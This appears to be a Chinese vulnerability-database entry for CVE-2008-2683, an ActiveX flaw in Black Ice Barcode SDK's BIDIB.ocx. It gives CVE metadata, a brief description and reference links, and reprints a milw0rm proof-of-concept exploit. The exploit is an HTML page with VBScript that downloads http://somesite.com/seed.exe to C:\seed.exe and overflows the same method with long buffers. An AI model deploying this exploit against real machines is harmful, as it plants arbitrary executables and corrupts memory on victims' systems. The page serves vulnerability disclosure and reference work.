Black_ice Barcode_sdk 输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115356 漏洞类型 输入验证
发布时间 2008-06-05 更新时间 2008-06-12
CVE编号 CVE-2008-2683 CNNVD-ID CNNVD-200806-183
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5750
https://www.securityfocus.com/bid/84943
https://cxsecurity.com/issue/WLB-2011060112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-183
|漏洞详情
BlackIceBarcodeSDK5.01版本中的BIDIB.ocx10.9.3.0版本里的BIDIB.BIDIBCtrl.1ActiveX控件远程攻击者可以通过区分下载图像文件URL的第一个自变量中的源URL和第二个自变量中的本地文件名,下载和存储任意文件。
|漏洞EXP
-----------------------------------------------------------------------------
 Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
 and Memory Corruption
 url: http://www.blackice.com

 File : BIDIB.ocx
 Ver. : 10.9.3.0
 CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}

 Mark.: RegKey Safe for Script: True
        RegKey Safe for Init: True
        Implements IObjectSafety: False

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Windows XP Professional SP3 fully patched, with Internet Explorer 7
 Windows 2k Professional SP3 fully patched, with Internet Explorer 6

 In memory of rgod
-----------------------------------------------------------------------------
<object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'>

<input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'>

<script language='vbscript'>
 Sub tryMe
  test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe"
 End Sub
</script>

<script language='vbscript'>
 Sub MemoryCorruption
  buff_0 = String(2068, "A")
  
  buff_1 = String(2068, "B")
  
  test.DownloadImageFileURL buff_0, buff_1
 End Sub  
</script>

# milw0rm.com [2008-06-05]
|受影响的产品
Black Ice Barcode Sdk 5.01
|参考资料

来源:XF
名称:barcode-bidib-file-overwrite(42891)
链接:http://xforce.iss.net/xforce/xfdb/42891
来源:MILW0RM
名称:5750
链接:http://www.milw0rm.com/exploits/5750
来源:VUPEN
名称:ADV-2008-1768
链接:http://www.frsirt.com/english/advisories/2008/1768/references
来源:SECUNIA
名称:30548
链接:http://secunia.com/advisories/30548